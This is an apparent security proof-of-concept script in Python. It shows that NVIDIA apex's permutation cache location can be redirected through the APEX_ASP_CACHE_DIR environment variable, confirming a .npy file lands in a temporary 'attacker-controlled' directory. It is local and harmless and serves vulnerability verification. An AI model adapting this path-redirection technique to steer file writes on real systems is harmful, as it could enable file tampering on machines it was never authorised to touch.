
"""PoC 01: apex cache path control write.

This is a local, benign verification script.
Expected result: a .npy file appears in the attacker-controlled cache dir.
"""

import os
import sys
import tempfile
import types
import importlib.util
from pathlib import Path


def _load_module(module_name: str, file_path: Path):
    """Load *file_path* as a module named *module_name* and register it.

    The module is inserted into ``sys.modules`` before its body runs, so that
    relative imports and self-references inside it resolve. This follows the
    ``importlib`` "importing a source file directly" recipe.

    Args:
        module_name: Fully qualified name to register the module under.
        file_path: Path to the Python source file to execute.

    Returns:
        The executed module object.

    Raises:
        RuntimeError: If no module spec or loader can be built for *file_path*.
        Exception: Anything raised while executing the module body is
            re-raised. The partially initialised module is first removed from
            ``sys.modules``, as the regular import system does.
    """
    spec = importlib.util.spec_from_file_location(module_name, str(file_path))
    if spec is None or spec.loader is None:
        raise RuntimeError(f"cannot build module spec for {file_path}")
    module = importlib.util.module_from_spec(spec)
    sys.modules[module_name] = module
    try:
        spec.loader.exec_module(module)
    except BaseException:
        # Don't leave a half-initialised module behind for later imports to find.
        sys.modules.pop(module_name, None)
        raise
    return module


def _load_exhaustive_search_without_apex_init(repo_apex: Path):
    """Import apex's ``exhaustive_search`` module without running ``apex/__init__.py``.

    For each parent package (``apex`` down to ``permutation_search_kernels``),
    an empty module object is registered in ``sys.modules``, unless one is
    already there. Its ``__path__`` points at the matching directory under
    *repo_apex*. This lets relative imports in the target resolve without
    executing the real package initialisers. ``permutation_utilities`` is
    loaded first, then ``exhaustive_search``.

    Args:
        repo_apex: Root of the apex checkout (the directory that contains ``apex/``).

    Returns:
        The loaded ``exhaustive_search`` module.
    """
    dotted_name = ""
    package_dir = repo_apex
    for segment in ("apex", "contrib", "sparsity", "permutation_search_kernels"):
        dotted_name = f"{dotted_name}.{segment}" if dotted_name else segment
        package_dir = package_dir / segment
        if dotted_name in sys.modules:
            continue
        # Lightweight shell: only __path__ is needed for submodule lookup.
        shell = types.ModuleType(dotted_name)
        shell.__path__ = [str(package_dir)]
        sys.modules[dotted_name] = shell

    # After the loop, dotted_name/package_dir describe permutation_search_kernels.
    _load_module(
        f"{dotted_name}.permutation_utilities",
        package_dir / "permutation_utilities.py",
    )
    search_module = _load_module(
        f"{dotted_name}.exhaustive_search",
        package_dir / "exhaustive_search.py",
    )
    return search_module


def main() -> int:
    """Run the PoC and report whether the cache write landed in our directory.

    Steps:
      1. Check that an ``apex`` checkout exists in the current directory.
      2. Create a fresh temporary directory and point ``APEX_ASP_CACHE_DIR``
         at a (not yet created) subdirectory of it.
      3. Load ``exhaustive_search`` without running ``apex/__init__.py``.
      4. Call ``generate_all_unique_combinations(4, 4)``, then check whether
         ``permutations_4_4.npy`` exists in the controlled directory.

    The temporary directory is removed only when the import fails, since
    nothing could have been written then. Otherwise it is left in place so
    any written file can be inspected afterwards.

    Returns:
        0 if the expected file was written; 1 if the repo is missing or the
        import or call fails; 2 if the call completed but the expected file
        is missing.
    """
    import shutil

    repo_apex = Path("apex")
    if not repo_apex.exists():
        print(f"[!] apex repo not found: {repo_apex}")
        return 1

    # Set the override *before* any apex code runs. It then takes effect
    # whether the module reads the variable at import time or at call time;
    # which one it does is not visible from this script.
    temp_root = Path(tempfile.mkdtemp(prefix="poc01_"))
    controlled = temp_root / "attacker_controlled_cache"
    os.environ["APEX_ASP_CACHE_DIR"] = str(controlled)

    try:
        exhaustive_search = _load_exhaustive_search_without_apex_init(repo_apex)
        generate_all_unique_combinations = exhaustive_search.generate_all_unique_combinations
    except Exception as exc:
        print(f"[!] import failed: {exc}")
        print("[i] this PoC avoids apex top-level import; install minimal deps (typically numpy).")
        shutil.rmtree(temp_root, ignore_errors=True)
        return 1

    print(f"[*] APEX_ASP_CACHE_DIR={controlled}")
    try:
        generate_all_unique_combinations(4, 4)
    except Exception as exc:
        # Report like the other failure paths instead of crashing.
        print(f"[!] call failed: {exc}")
        return 1

    expected = controlled / "permutations_4_4.npy"
    if expected.exists():
        print(f"[+] success: controlled write observed: {expected}")
        return 0

    print(f"[-] failed: expected file not found: {expected}")
    return 2


if __name__ == "__main__":
    raise SystemExit(main())
